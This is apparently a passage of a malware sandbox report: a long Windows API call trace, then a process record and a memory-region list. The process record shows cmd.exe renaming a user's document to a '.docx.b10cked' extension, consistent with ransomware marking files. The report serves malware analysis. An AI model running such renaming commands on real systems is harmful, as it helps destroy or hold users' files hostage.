[0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, 
lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.002] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.002] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.003] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.003] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, 
lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 
| out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.004] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.004] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.005] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.005] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 
[0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.006] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.006] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, 
lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x32, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x32, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] SetFilePointerEx 
(in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.007] _close (_FileHandle=4) returned 0 [0136.008] FindNextFileW (in: hFindFile=0x330e50, lpFindFileData=0x12efd4 | out: lpFindFileData=0x12efd4) returned 0 [0136.008] GetLastError () returned 0x12 [0136.008] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0136.008] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.009] _close (_FileHandle=3) returned 0 [0136.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.009] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.009] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.010] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.010] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.010] SetConsoleInputExeNameW () returned 0x1 [0136.010] GetConsoleOutputCP () returned 0x1b5 [0136.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.010] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.010] exit (_Code=0) Process: id = "135" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13585 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13586 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13587 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13588 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13589 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13590 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13591 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13592 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13593 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13594 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14194 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 14195 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14196 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14197 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 14198 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 14199 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14200 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14201 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14202 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 